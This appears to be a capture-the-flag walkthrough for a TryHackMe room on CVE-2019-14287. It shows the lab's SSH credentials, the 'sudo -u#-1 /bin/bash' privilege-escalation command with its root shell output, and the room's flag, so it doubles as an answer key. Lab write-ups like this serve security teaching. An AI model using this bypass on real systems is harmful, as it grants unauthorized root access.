Tryhackme - Sudo Security Bypass

Tryhackme – Sudo Security Bypass

In this walk through, we will be going through the Sudo Security Bypass room from Tryhackme. In this room, we will explore CVE-2019-14287 which is a vulnerability found in Unix Sudo Program and exploit it to get the root. On that note, let’s get started.

Sudo Security Bypass

Machine Info:

TitleSudoVulns
IPaddress10.10.177.149
DifficultyEasy
ObjectiveA tutorial room exploring CVE-2019-14287 in the Unix Sudo Program. Room One in the SudoVulns Series

Task 1 – Deploy!

Task 1 - Deploy!

ssh -p 2222 [email protected]

ssh login

Task 1 - Deploy!

Task 2 – Security Bypass

SSH into that machine you deployed earlier, using port 2222.

The credentials are:

Username: tryhackme
Password: tryhackme

If you’re using Linux, the command will look like this:

ssh -p 2222 [email protected]

Question 1 – What command are you allowed to run with sudo?

sudo -l

sudo -l

 /bin/bash

Question 2 – What is the flag in /root/root.txt?

tryhackme@sudo-privesc:~$ sudo -u#-1 /bin/bash
root@sudo-privesc:~# 
root@sudo-privesc:~# id
uid=0(root) gid=1000(tryhackme) groups=1000(tryhackme)
root@sudo-privesc:~# whoami 
root
root@sudo-privesc:~# cat /root/root.txt 
THM{l33t_s3cur1ty_bypass}
root@sudo-privesc:~# 

root.txt

THM{l33t_s3cur1ty_bypass}

Task 2 - Security Bypass

Also Read: Tryhackme – SQL Injection Lab

So that was “Sudo Security Bypass” for you. In this room, we have learned and explored the CVE-2019-14287 which is a vulnerability found in Unix Sudo Program and exploit it to get the root. We logged into the server using SSH and then used the sudo bypass command and got our root flag. On that note, i will take your leave but stay tuned for the next one and till then, remember to “Hack the planet”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top